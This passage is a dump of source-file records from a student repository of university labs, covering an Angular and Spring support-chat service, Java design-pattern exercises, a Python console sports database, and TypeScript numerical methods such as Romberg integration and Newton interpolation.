0.7471747994422913, "avg_line_length": 30.44628143310547, "blob_id": "c8e40bc24f2c05ee0977a8534aa799c295d094f9", "content_id": "1518567fdca47401a3a96d8aeafda162279ae0de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 3805, "license_type": "no_license", "max_line_length": 134, "num_lines": 121, "path": "/insurance/frontend/src/app/supporter-consultation.service.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {Injectable} from '@angular/core';\nimport {webSocketUrl} from '../util/urls';\nimport {BufferSendableState, ConnectionContext, WebSocketSendableState} from '../websocket/ConnectionContext';\nimport {Observable} from '@reactivex/rxjs';\nimport {\n AnswerClientRequest,\n AssignClientRequest,\n ClientAssignedNotification,\n ClientDisconnectNotification, FreeClientListNotification, FreeClientListRequest, ListClientMessagesRequest, MessageListNotification,\n NewAnswerNotification, NewClientNotification, NewQuestionNotification, SupportMessage, UnassignClientRequest, WsNotification,\n WsNotificationVisitor\n} from '../consultation/ConsultationMessage';\nimport {JsonMessageFactory} from '../consultation/MessageFactory';\nimport {isUndefined} from 'util';\n\nexport class ClientInfo{\n\n constructor(id: string) {\n this.id = id;\n }\n\n id: string;\n messages: SupportMessage[] = [];\n hasNewMessages: boolean = false;\n assigned: boolean = false;\n assignedToMe : boolean = false;\n}\n\nclass SupporterVisitor implements WsNotificationVisitor{\n visitMessageListNotification(c: MessageListNotification) {\n this.s.clients[c.clientId].messages = c.messages;\n }\n\n constructor(private s: SupporterConsultationService){}\n\n visitNewQuestionNotification(c: NewQuestionNotification) {\n this.s.clients[c.clientId].messages.push(c.message);\n this.s.clients[c.clientId].hasNewMessages = true;\n }\n\n visitNewClientNotification(c: NewClientNotification) {\n this.s.clients[c.clientId] = new ClientInfo(c.clientId);\n }\n\n visitNewAnswerNotification(c: NewAnswerNotification) {\n throw new Error('Can\\'t receive answers');\n }\n\n visitClientDisconnectNotification(c: ClientDisconnectNotification) {\n delete this.s.clients[c.clientId];\n }\n\n visitFreeClientListNotification(c: FreeClientListNotification) {\n c.clients.forEach(freeClientId=>{\n if(!isUndefined(this.s.clients[freeClientId])) {\n this.s.clients[freeClientId].assigned = false;\n this.s.clients[freeClientId].assignedToMe = false;\n } else this.s.clients[freeClientId] = new ClientInfo(freeClientId);\n })\n }\n\n visitClientAssignedNotification(c: ClientAssignedNotification) {\n this.s.clients[c.clientId].assigned = true;\n this.s.clients[c.clientId].assignedToMe = c.toRecv;\n }\n\n}\n\n@Injectable()\nexport class SupporterConsultationService {\n\n\n private wsUrl = webSocketUrl('/ws/consult/support');\n private wsCtx = new ConnectionContext();\n wsObservable: Observable<WsNotification>;\n clients: { [id: string]: ClientInfo} = {};\n selectedClient: string;\n\n private visitor = new SupporterVisitor(this);\n\n constructor() {\n this.wsCtx.setState(new BufferSendableState());\n\n const messageFactory = new JsonMessageFactory();\n\n const ws = new WebSocket(this.wsUrl);\n ws.onopen = ev=>this.wsCtx.setState(new WebSocketSendableState(ws));\n\n this.wsObservable = Observable.create(observer=>{\n ws.onmessage = ev=>observer.next(ev.data);\n }).map(msg=> messageFactory.create(msg));\n\n this.wsObservable.subscribe(n=>n.accept(this.visitor));\n }\n\n refreshFree(){\n this.wsCtx.write(new FreeClientListRequest);\n }\n\n selectClient(clientId: string){\n this.selectedClient = clientId;\n this.wsCtx.write(new ListClientMessagesRequest(clientId))\n }\n\n assignClient(clientId: string){\n this.selectedClient = clientId;\n this.wsCtx.write(new AssignClientRequest(clientId))\n }\n\n unassignClient(clientId: string){\n this.selectedClient = undefined;\n this.wsCtx.write(new UnassignClientRequest(clientId))\n }\n\n writeAnswer(message: string){\n const clientId = this.selectedClient;\n const supportMessage = new SupportMessage(message, true);\n this.clients[clientId].messages.push(supportMessage);\n this.wsCtx.write(new AnswerClientRequest(clientId, message));\n }\n}\n" }, { "alpha_fraction": 0.6774193644523621, "alphanum_fraction": 0.6774193644523621, "avg_line_length": 27, "blob_id": "41556cf526c46200e185f06e028277391a3715de", "content_id": "d15d9e28ea2ee50ec5b968c08aaa1426144b43a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 31, "license_type": "no_license", "max_line_length": 27, "num_lines": 1, "path": "/despat/settings.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "rootProject.name = 'despat'\r\n\r\n" }, { "alpha_fraction": 0.7039999961853027, "alphanum_fraction": 0.7279999852180481, "avg_line_length": 18.83333396911621, "blob_id": "b037be5b9ca72aefd71cbe37621ba5a3f48583e2", "content_id": "cd9412d171ab4abc4e48a09809234fb7506d17ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 125, "license_type": "no_license", "max_line_length": 49, "num_lines": 6, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab2/task2/PaymentMethod.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab2.task2;\r\n\r\n//Adaptor\r\npublic interface PaymentMethod {\r\n boolean tryPass();\r\n}\r\n" }, { "alpha_fraction": 0.450945109128952, "alphanum_fraction": 0.45214521884918213, "avg_line_length": 25.0390625, "blob_id": "d5f447aea101b4108aca7fbfcbbe3996bc03bfbc", "content_id": "1cd77c644d0fa0007d0de5879175e7b4dfb044cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3333, "license_type": "no_license", "max_line_length": 62, "num_lines": 128, "path": "/db/lab1/app.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "from lab1.sport import SportDB\nfrom pickle import load, dump\n\nclass ExitEx(Exception):\n pass\n\ndef exitF():\n raise ExitEx()\n\ndef ask(p):\n return input(p).strip()\n\nclass Program:\n def add_team(self):\n self.db.team.add(\n name = ask(\"Team name: \"),\n origin = ask(\"Team origin: \"),\n sport = ask(\"Team sport: \")\n )\n\n def del_team(self):\n name = ask(\"Team name: \")\n self.db.team.delete(self.db.team.find(name=name))\n\n def del_player(self):\n id = ask(\"Player ID: \")\n self.db.player.delete(self.db.player.find(id=int(id)))\n\n def add_player(self):\n self.db.player.add(\n name = ask(\"Player name: \"),\n team_name = ask(\"Player team: \"),\n score = 0\n )\n def mod_player(self):\n id = int(ask(\"Player id: \"))\n players = self.db.player.find(id=id)\n if not players:\n raise ValueError(\"Player not found\")\n else:\n player = players[0]\n\n rewrite = {}\n for k,v in player.items():\n upd = ask(\"{}, default: '{}': \".format(k, v))\n if upd == \"\":\n rewrite[k] = v\n else:\n rewrite[k] = upd\n\n self.db.player.update(players, **rewrite)\n\n def mod_team(self):\n name = ask(\"Team name: \")\n teams = self.db.team.find(name=name)\n if not teams:\n raise ValueError(\"Team not found\")\n else:\n team = teams[0]\n\n rewrite = {}\n for k,v in team.items():\n upd = ask(\"{}, default: {}: \".format(k, v))\n if upd == \"\":\n rewrite[k] = v\n else:\n rewrite[k] = upd\n\n self.db.team.update(teams, **rewrite)\n\n def exit():\n raise ExitEx()\n\n def print_help(self):\n print(list(self.commands.keys()))\n\n def print_best(self):\n print(self.db.best())\n\n def print_players(self):\n print(self.db.player.find())\n\n def print_teams(self):\n print(self.db.team.find())\n\n def load(self):\n with open(\"db.pk\", \"rb\") as f:\n self.db = load(f)\n\n def save(self):\n with open(\"db.pk\", \"wb\") as f:\n dump(self.db, f)\n\n\n def __init__(self):\n self.db = SportDB()\n self.commands = {\n \"exit\": exit,\n \"help\": self.print_help,\n \"load\": self.load,\n \"save\": self.save,\n \"add team\": self.add_team,\n \"del team\": self.del_team,\n \"mod team\": self.mod_team,\n \"add player\": self.add_player,\n \"del player\": self.del_player,\n \"mod player\": self.mod_player,\n \"best\": self.print_best,\n \"teams\": self.print_teams,\n \"players\": self.print_players\n }\n\n\n def run(self):\n try:\n while True:\n cmd = input(\">> \").strip()\n try:\n if cmd in self.commands:\n self.commands[cmd]() \n else:\n print(\"Command not found\")\n except ValueError as e:\n print(e)\n except ExitEx:\n pass\n\nProgram().run()\n" }, { "alpha_fraction": 0.5249484777450562, "alphanum_fraction": 0.53030925989151, "avg_line_length": 30.33333396911621, "blob_id": "aeb395f31a1bbf8caef5a3a15b12acafcfd6ee8f", "content_id": "e6f405572e4def2f6c257e5b2cb0a43779724a3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4850, "license_type": "no_license", "max_line_length": 103, "num_lines": 150, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab2/datatypes/VectorVal.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2.datatypes;\r\n\r\nimport Jama.Matrix;\r\nimport io.github.k_gregory.otp.lab2.MathValVisitor;\r\n\r\nimport java.util.Arrays;\r\nimport java.util.stream.Collectors;\r\n\r\nimport static java.util.Arrays.stream;\r\n\r\npublic class VectorVal extends MathVal {\r\n private MathVal[] elements;\r\n\r\n public VectorVal(MathVal... elements) {\r\n this.elements = elements;\r\n }\r\n\r\n public static VectorVal fromMatrix(Matrix m) {\r\n double[][] array = m.getArray();\r\n VectorVal[] rows = new VectorVal[array.length];\r\n for (int i = 0; i < array.length; i++) {\r\n NumVal[] cols = new NumVal[array[i].length];\r\n for (int j = 0; j < array[i].length; j++)\r\n cols[j] = new NumVal(array[i][j]);\r\n rows[i] = new VectorVal(cols);\r\n }\r\n return new VectorVal(rows);\r\n }\r\n\r\n @Override\r\n public MathVal accept(MathValVisitor v) {\r\n return v.visit(this);\r\n }\r\n\r\n private void assureSameLength(VectorVal other) {\r\n if (elements.length != other.elements.length)\r\n throw new IllegalArgumentException(\"Different number of elements in vector\");\r\n }\r\n\r\n public Matrix toMatrix() {\r\n int m = elements.length;\r\n int n = ((VectorVal) elements[0]).elements.length;\r\n Matrix matrix = new Matrix(m, n);\r\n for (int i = 0; i < m; i++) {\r\n MathVal[] rows = ((VectorVal) elements[i]).elements;\r\n for (int j = 0; j < n; j++) {\r\n matrix.set(i, j, ((NumVal) rows[j]).val);\r\n }\r\n }\r\n return matrix;\r\n }\r\n\r\n @Override\r\n public MathVal mul(MathVal right) {\r\n return right.accept(new MathValVisitor() {\r\n @Override\r\n public MathVal visit(NumVal num) {\r\n return new VectorVal(stream(elements).map(el -> el.mul(num)).toArray(MathVal[]::new));\r\n }\r\n\r\n @Override\r\n public MathVal visit(VectorVal vector) {\r\n assureSameLength(vector);\r\n MathVal sum = elements[0].mul(vector.elements[0]);\r\n for (int i = 1; i < elements.length; i++) {\r\n sum = sum.plus(elements[i].mul(vector.elements[i]));\r\n }\r\n return sum;\r\n }\r\n });\r\n }\r\n\r\n @Override\r\n public MathVal plus(MathVal right) {\r\n return right.accept(new MathValVisitor() {\r\n @Override\r\n public MathVal visit(NumVal num) {\r\n return new VectorVal(stream(elements).map(el -> el.plus(num)).toArray(MathVal[]::new));\r\n }\r\n\r\n @Override\r\n public MathVal visit(VectorVal vector) {\r\n assureSameLength(vector);\r\n MathVal[] newVector = new MathVal[elements.length];\r\n for (int i = 0; i < elements.length; i++)\r\n newVector[i] = elements[i].plus(vector.elements[i]);\r\n return new VectorVal(newVector);\r\n }\r\n });\r\n }\r\n\r\n @Override\r\n public MathVal vMul(MathVal right) {\r\n return right.accept(new MathValVisitor() {\r\n @Override\r\n public MathVal visit(VectorVal vector) {\r\n if (elements.length != 3 || vector.elements.length != 3)\r\n throw new IllegalArgumentException(\"Can't mult vectors if not 3 dismension\");\r\n MathVal[] a = elements;\r\n MathVal[] b = vector.elements;\r\n\r\n MathVal iPart = a[1].mul(b[2]).minus(a[2].mul(b[1]));\r\n MathVal jPart = a[2].mul(b[0]).minus(a[0].mul(b[2]));\r\n MathVal kPart = a[0].mul(b[1]).minus(a[1].mul(b[0]));\r\n\r\n return new VectorVal(iPart, jPart, kPart);\r\n }\r\n });\r\n }\r\n\r\n @Override\r\n public MathVal matMul(MathVal other) {\r\n return other.accept(new MathValVisitor() {\r\n @Override\r\n public MathVal visit(VectorVal vector) {\r\n return fromMatrix(toMatrix().times(vector.toMatrix()));\r\n }\r\n });\r\n }\r\n\r\n @Override\r\n public MathVal inverse() {\r\n return fromMatrix(toMatrix().inverse());\r\n }\r\n\r\n @Override\r\n public MathVal transpose() {\r\n return fromMatrix(toMatrix().transpose());\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return \"[\" + stream(elements).map(MathVal::toString).collect(Collectors.joining(\",\")) + \"]\";\r\n }\r\n\r\n @Override\r\n public boolean equals(Object o) {\r\n if (this == o) return true;\r\n if (o == null || getClass() != o.getClass()) return false;\r\n\r\n VectorVal vectorVal = (VectorVal) o;\r\n\r\n return Arrays.deepEquals(vectorVal.elements, elements);\r\n }\r\n\r\n @Override\r\n public int hashCode() {\r\n return Arrays.deepHashCode(elements);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6343033909797668, "alphanum_fraction": 0.6345511078834534, "avg_line_length": 38.39024353027344, "blob_id": "5963ec843d4246d986185521ab01a040bce10ded", "content_id": "5c874c4e8623b90d7d86d169f94723ec30f7f1a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 8075, "license_type": "no_license", "max_line_length": 106, "num_lines": 205, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/impl/ConsultMediatorImpl.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult.impl;\n\nimport com.google.common.collect.ArrayListMultimap;\nimport com.google.common.collect.HashMultimap;\nimport com.google.common.collect.ListMultimap;\nimport com.google.common.collect.Multimap;\nimport io.github.k_gregory.insurance.service.consult.ConsultCollegaue;\nimport io.github.k_gregory.insurance.service.consult.ConsultMediator;\nimport io.github.k_gregory.insurance.service.consult.data.*;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\nimport org.springframework.stereotype.Service;\n\nimport java.io.IOException;\nimport java.util.*;\nimport java.util.stream.Collectors;\n\n@Service\npublic class ConsultMediatorImpl implements ConsultMediator {\n private final static Logger log = LoggerFactory.getLogger(ConsultMediatorImpl.class);\n\n private final Map<String, ConsultClient> clientIds = new HashMap<>();\n private final Set<ConsultClient> freeClients = new HashSet<>();\n private final Set<ConsultSupporter> supporters = new HashSet<>();\n private final ListMultimap<ConsultClient, SupportMessage> clientMessages = ArrayListMultimap.create();\n private final Map<ConsultClient, ConsultSupporter> clientConsulter = new HashMap<>();\n private final Multimap<ConsultSupporter, ConsultClient> consultClients = HashMultimap.create();\n\n\n @Override\n public synchronized void connectClient(ConsultClient client) {\n if (clientIds.put(client.getId(), client) != null) {\n log.warn(\"Added client that was in the list\");\n }\n\n if (!freeClients.add(client)) {\n log.warn(\"New client was in the set\");\n }\n\n NewClientNotification newClientNotification = new NewClientNotification(client.getId());\n for (ConsultSupporter s : supporters)\n try {\n s.sendNotification(newClientNotification);\n } catch (IOException e) {\n log.warn(\"Can't sendNotification supporter about connect\", e);\n }\n\n }\n\n @Override\n public synchronized void acceptClientQuestion(ConsultClient client, String messageText) {\n SupportMessage message = new SupportMessage(messageText, false);\n clientMessages.put(client, message);\n\n NewQuestionNotification notification = new NewQuestionNotification(client.getId(), message);\n for(ConsultSupporter supporter: supporters)\n try {\n supporter.sendNotification(notification);\n\n } catch (IOException e) {\n log.warn(\"Can't sendNotification supporter about new question\", e);\n }\n }\n\n @Override\n public synchronized void disconnectClient(ConsultClient client) {\n ConsultSupporter supporter = clientConsulter.get(client);\n\n for(ConsultSupporter s: supporters)\n try {\n s.sendNotification(new ClientDisconnectNotification(client.getId()));\n } catch (Throwable e) {\n log.warn(\"Can't sendNotification supporter about client disconnect\", e);\n }\n\n if (supporter != null) { //Supporter was assign, client not free\n if (supporter != clientConsulter.remove(client))\n log.warn(\"Supporter was not assigned\");\n if(!consultClients.remove(supporter, client))\n log.warn(\"Client was not assigned\");\n } else { //Client was free\n if (!freeClients.remove(client))\n log.warn(\"Client was not in free set\");\n }\n\n if (client != clientIds.remove(client.getId()))\n log.warn(\"Wrong ID mapping\");\n\n clientMessages.removeAll(client);\n\n }\n\n @Override\n public synchronized void connectSupporter(ConsultSupporter supporter) {\n if (!supporters.add(supporter))\n log.warn(\"Supporter already was in the set\");\n }\n\n @Override\n public synchronized Set<String> listFreeClients() {\n return freeClients\n .stream()\n .map(ConsultCollegaue::getId)\n .collect(Collectors.toSet());\n }\n\n @Override\n public synchronized void acceptClient(ConsultSupporter supporter, String clientId) {\n ConsultClient client = clientIds.get(clientId);\n if (client == null) {\n log.warn(\"Supporter tried to accept non-existent client\");\n } else if (!freeClients.contains(client)) {\n log.warn(\"Supporter tried to accept non-free client\");\n } else {\n for(ConsultSupporter s : supporters)\n try {\n s.sendNotification(new ClientAssignedNotification(clientId, s==supporter));\n } catch (IOException e) {\n log.warn(\"Can't notify supporter about assign\", e);\n }\n if (clientConsulter.put(client, supporter) != null)\n log.warn(\"Client already had supporter\");\n if (!consultClients.put(supporter, client))\n log.warn(\"Client was already accepted\");\n if (!freeClients.remove(client))\n log.warn(\"Client wasn't in free clientIds set\");\n }\n\n }\n\n @Override\n public synchronized void unacceptClient(ConsultSupporter supporter, String clientId) {\n ConsultClient client = clientIds.get(clientId);\n if (client == null)\n log.warn(\"Supporter tried to un-accept non-existent client\");\n else {\n NewClientNotification newClientNotification = new NewClientNotification(clientId);\n for(ConsultSupporter s : supporters)\n try {\n s.sendNotification(newClientNotification);\n } catch (IOException e) {\n log.warn(\"Can't notify supporter about new client\", e);\n }\n if (supporter != clientConsulter.remove(client))\n log.warn(\"Client wasn't assign to supporter\");\n if (!consultClients.remove(supporter, client))\n log.warn(\"Supporter wasn't assigned to client\");\n if (!freeClients.add(client))\n log.warn(\"Client was in free clientIds set\");\n }\n\n }\n\n @Override\n public synchronized List<SupportMessage> listClientMessages(String clientId) {\n ConsultClient client = clientIds.get(clientId);\n\n if (client == null) {\n log.warn(\"Client not found\");\n return Collections.emptyList();\n }\n\n List<SupportMessage> messages = this.clientMessages.get(client);\n return Collections.unmodifiableList(messages);\n\n }\n\n @Override\n public synchronized void acceptSupporterAnswer(ConsultSupporter supporter, String to, String msg) {\n SupportMessage message = new SupportMessage(msg, true);\n ConsultClient client = clientIds.get(to);\n if (client == null) {\n log.warn(\"Supporter sent message to non-existent client\");\n } else {\n NewAnswerNotification notification = new NewAnswerNotification(message);\n clientMessages.put(client, message);\n try {\n client.sendNotification(notification);\n } catch (IOException e) {\n log.warn(\"Can't sendNotification client about new message\", e);\n }\n }\n\n }\n\n @Override\n public synchronized void disconnectSupporter(ConsultSupporter supporter) {\n Collection<ConsultClient> clients = consultClients.removeAll(supporter);\n freeClients.addAll(clients);\n for (ConsultClient client : clients) {\n NewClientNotification newClientNotification = new NewClientNotification(client.getId());\n if (supporter != clientConsulter.remove(client))\n log.warn(\"Client wasn't assigned to supporter\");\n for(ConsultSupporter s : supporters)\n try {\n s.sendNotification(newClientNotification);\n } catch (IOException e) {\n log.warn(\"Can't notify about new client\", e);\n }\n }\n if (!supporters.remove(supporter))\n log.warn(\"Supporter wasn't connected\");\n\n }\n}\n" }, { "alpha_fraction": 0.5866013169288635, "alphanum_fraction": 0.5996732115745544, "avg_line_length": 17.74193572998047, "blob_id": "2b41a9981b43d07c48053d930ae68410b72d0c11", "content_id": "c2700d133904d2ff703e8c847753253aee443a17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 612, "license_type": "no_license", "max_line_length": 59, "num_lines": 31, "path": "/oldtest/rss-reader/src/main/java/io/github/k_gregory/otp/rss_reader/entity/OldDocument.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.rss_reader.entity;\r\n\r\nimport javax.persistence.*;\r\n\r\n/**\r\n * Created by grego on 13.05.2017.\r\n */\r\n\r\n@Entity\r\npublic class OldDocument {\r\n private Integer id;\r\n private String content;\r\n\r\n @Id @GeneratedValue(strategy = GenerationType.IDENTITY)\r\n public Integer getId() {\r\n return id;\r\n }\r\n\r\n public void setId(Integer id) {\r\n this.id = id;\r\n }\r\n\r\n @Column(columnDefinition = \"text\")\r\n public String getContent() {\r\n return content;\r\n }\r\n\r\n public void setContent(String content) {\r\n this.content = content;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5346869826316833, "alphanum_fraction": 0.5532994866371155, "avg_line_length": 22.625, "blob_id": "fa010fe444198d152e44d40cca25e0dca42bc66a", "content_id": "45b6a74beb1d031754bc1e66361e4229c40eb9f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 591, "license_type": "no_license", "max_line_length": 80, "num_lines": 24, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/MaleGiftVisitor.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\n/**\r\n * Created by grego on 08.04.2017.\r\n */\r\npublic class MaleGiftVisitor extends BaseGiftVisitor {\r\n public MaleGiftVisitor(String name, int calmLevel) {\r\n super(name, calmLevel);\r\n }\r\n\r\n @Override\r\n public void visit(CarModel c) {\r\n if (!isCalm()) {\r\n System.out.println(name + \" doesn't like \" + c + \", he crushes it\");\r\n c.crush();\r\n }\r\n c.move();\r\n }\r\n\r\n @Override\r\n public void visit(Doll d) {\r\n say(d + \" is still better than a sweetroll\");\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5993788838386536, "alphanum_fraction": 0.5993788838386536, "avg_line_length": 34.77777862548828, "blob_id": "20b1a3d50b7c7f5ad2f6442f26d2b13fbf336348", "content_id": "b319be946c0d04343c645ad3736c439eaa5b5230", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 322, "license_type": "no_license", "max_line_length": 84, "num_lines": 9, "path": "/insurance/frontend/src/util/urls.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export function webSocketUrlRelative(s: string):string {\n let l = window.location;\n return ((l.protocol === \"https:\") ? \"wss://\" : \"ws://\") + l.host + l.pathname + s;\n}\n\nexport function webSocketUrl(s: string):string {\n let l = window.location;\n return ((l.protocol === \"https:\") ? \"wss://\" : \"ws://\") + l.host + s;\n}\n" }, { "alpha_fraction": 0.5208955407142639, "alphanum_fraction": 0.5343283414840698, "avg_line_length": 19, "blob_id": "e9a0e04766c2de36c3b39a1af8dbe700d1f105ae", "content_id": "5d98083d599288631e5fa381785e60ee4c2753b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1340, "license_type": "no_license", "max_line_length": 101, "num_lines": 67, "path": "/numerical-methods/src/app/romberg.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {trapetion_simple} from \"./trapetion\";\n\nexport function trapetion_one(f: (number)=> number, low: number, high: number): number {\n return (f(low) + f(high)) / 2 * (high - low);\n}\n\nexport interface RombergResult {\n table: number[][];\n result: number,\n accuracy: number\n}\n\nexport function romberg(f: (number)=>number, low : number, high: number, e : number): RombergResult {\n if(low > high) throw new Error(\"Low bigger than high\");\n if(e <= 0)throw new Error(\"Too small e\");\n\n if(low == high) return {\n table: [],\n result: 0,\n accuracy: 0\n };\n\n\n let h = high - low;\n let i = 1;\n let accuracy = NaN;\n\n const I : number[][] = [];\n I.push([trapetion_one(f, low, high)]);\n\n\n while (true){\n let breaked = false;\n h = h / 2;\n\n I.push([trapetion_simple(f, low, high, h)]);\n\n for(let k = 1; k <= i; k++){\n let r = (I[i][k-1] - I[i-1][k-1]) / (Math.pow(2, 2 * k) - 1);\n const new_value = I[i][k-1] + r;\n I[i].push(new_value);\n\n if(Math.abs(r) < e) {\n accuracy = Math.abs(r);\n breaked = true;\n break;\n }\n }\n i++;\n\n if(breaked){\n break;\n }\n\n if(i > 30) {\n throw new Error(`Can't get accuracy in ${i} iterations`);\n }\n }\n\n const lastA = I[I.length - 1];\n\n return {\n result:lastA[lastA.length - 1],\n table: I,\n accuracy\n };\n}\n" }, { "alpha_fraction": 0.5358842015266418, "alphanum_fraction": 0.5367114543914795, "avg_line_length": 30.8092098236084, "blob_id": "59e8dc5b4f13ff167bc0933e16ef219c406502db", "content_id": "060417404708813a29f7a3c031b5015cf1a019ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4835, "license_type": "no_license", "max_line_length": 99, "num_lines": 152, "path": "/db/lab1/data.py", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "class Seq:\n def __init__(self):\n self.s = 0\n\n def __call__(self):\n self.s += 1\n return self.s\n\ndef autoinc():\n return Seq()\n\nclass AttributeReference:\n def __init__(self, table, attribute, referer, ref_attr):\n self.table = table\n self.attribute = attribute\n self.referer = referer\n self.ref_attr = ref_attr\n\n\nclass Attribute:\n def __init__(self, name, can_none=True, reference=None, default=None, unique=False):\n self.name = name\n self.reference = reference\n self.default = default\n self.references = []\n self.can_none = can_none\n self.unique = unique\n\n def __str__(self):\n if self.reference is not None:\n return \"'{}, refers {}\".format(self.name, self.reference)\n else:\n return \"'{}\".format(self.name)\n\n\nclass Table:\n @staticmethod\n def check_attributes(attributes):\n if len(attributes) < 1:\n raise ValueError(\"Table must have at least one attribute\")\n\n attr_names = set()\n for attr in attributes:\n if attr.name in attr_names:\n raise ValueError(\"Duplicate attribute name\")\n else:\n attr_names.add(attr.name)\n\n def __init__(self, *attributes):\n Table.check_attributes(attributes)\n self.data = []\n\n for attr in attributes:\n ref_mk = attr.reference\n if ref_mk is not None:\n attr.reference = ref_mk(self, attr.name)\n self.attributes = dict([(attr.name, attr) for attr in attributes])\n self.uniques = dict([(attr.name, set()) for attr in attributes if attr.unique])\n\n def reference(self, attribute_name):\n if attribute_name not in self.attributes:\n raise ValueError(\"Can't get reference to non-existent attribute\")\n if attribute_name not in self.uniques:\n raise ValueError(\"Can't get reference to non-unique attribute\")\n\n attr = self.attributes[attribute_name]\n\n def create_reference(referer, ref_attr):\n r = AttributeReference(self, attr, referer, ref_attr)\n attr.references.append(r)\n return r\n\n return create_reference\n\n def check_modify(self, mrow, attribute):\n for ref in attribute.references:\n for row in ref.referer.data:\n if ref.ref_attr in row and attribute.name in mrow:\n if row[ref.ref_attr] == mrow[attribute.name]:\n raise ValueError(\"Can't modify {}, dependent row exists\".format(attribute))\n\n def find(self, **conds):\n for k in conds:\n if not k in self.attributes:\n raise ValueError(\"Can't find by non-existent attribute\")\n\n rs = []\n for row in self.data:\n matches = True\n for k,v in conds.items():\n if row[k] != v:\n matches = False\n break\n if matches:\n rs.append(row)\n\n return rs\n\n\n def __update_row(self, row, updates):\n for attr in self.attributes.values():\n if not attr.name in updates:\n continue\n else:\n v = updates[attr.name]\n\n if v is None and not attr.can_none:\n raise ValueError(\"Can't put None to {}\".format(attr.name))\n\n ref = attr.reference\n if ref is not None:\n if len(ref.table.find(**{ref.attribute.name:v})) != 1:\n raise ValueError(\"Can't reference {}\".format(ref.attribute.name))\n\n if attr.unique:\n if v in self.uniques[attr.name]:\n if attr.name in row and row[attr.name] == v:\n pass\n else:\n raise ValueError(\"Unique constraint fail: {}\".format(attr.name))\n else:\n if attr.name in row:\n self.uniques[attr.name].remove(row[attr.name])\n self.uniques[attr.name].add(v)\n\n self.check_modify(row, attr)\n row[attr.name] = v\n\n def delete(self, rows):\n for row in rows:\n for attr in self.attributes.values():\n self.check_modify(row, attr)\n if attr.unique:\n self.uniques[attr.name].remove(row[attr.name])\n\n #WHYYY???\n self.data = list(filter(lambda r: r not in rows, self.data))\n\n def update(self, rows, **changes):\n for row in rows:\n self.__update_row(row, changes)\n\n def add(self, **values):\n row = {}\n\n for attr in self.attributes.values():\n if attr.name not in values:\n values[attr.name] = attr.default()\n\n\n self.__update_row(row, values)\n self.data.append(row)\n" }, { "alpha_fraction": 0.5775039196014404, "alphanum_fraction": 0.5870508551597595, "avg_line_length": 25.54838752746582, "blob_id": "48a57a182005aa52fe9bdf11f8d61b5e5ffb8fbe", "content_id": "35dd7585f90e5ba17f5471beed34247fe3b93f93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 5761, "license_type": "no_license", "max_line_length": 95, "num_lines": 217, "path": "/numerical-methods/src/app/newton.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export class FirstNewton {\n _values: { x: number, y: number }[];\n\n constructor(_values: { x: number, y: number }[]) {\n this._values = [..._values];\n this._values.sort((a,b)=>(b.x - a.x))\n }\n\n _cache: { [key: string]: number } = {};\n\n private CalculateBase(point: number): number {\n let baseValue = Number.MAX_VALUE;\n let baseIndex = -1;\n for (let i = 0; i < this._values.length; i++) {\n const value = this._values[i].x;\n if (Math.abs(point - value) < Math.abs(point - baseValue)) {\n baseValue = value;\n baseIndex = i;\n }\n }\n\n return baseIndex;\n }\n\n\n private PopulateCache(baseIndex: number): number {\n const d = 100;\n const epsilon = 5 * Math.pow(10, -d);\n\n for (let length = 1; length + baseIndex < this._values.length; length++) {\n let isLargerThanEpsilon = false;\n\n for (let from = baseIndex; from + length < this._values.length; from++) {\n let delta = this.CalculateDelta(from, length);\n this._cache[FirstNewton.GetCacheKey(from, length)] = delta;\n if (Math.abs(delta) > epsilon)\n isLargerThanEpsilon = true;\n }\n\n if (!isLargerThanEpsilon)\n return length;\n }\n\n return this._values.length - baseIndex;\n }\n\n private CalculateDelta(from: number, length: number): number {\n if (length == 1)\n return this._values[from].y;\n\n return (this.CachedDelta(from + 1, length - 1) - this.CachedDelta(from, length - 1))\n / (this._values[from + length - 1].x - this._values[from].x);\n }\n\n private static GetCacheKey(from: number, length: number): string {\n return `${from}: ${length}`;\n }\n\n private CachedDelta(from: number, 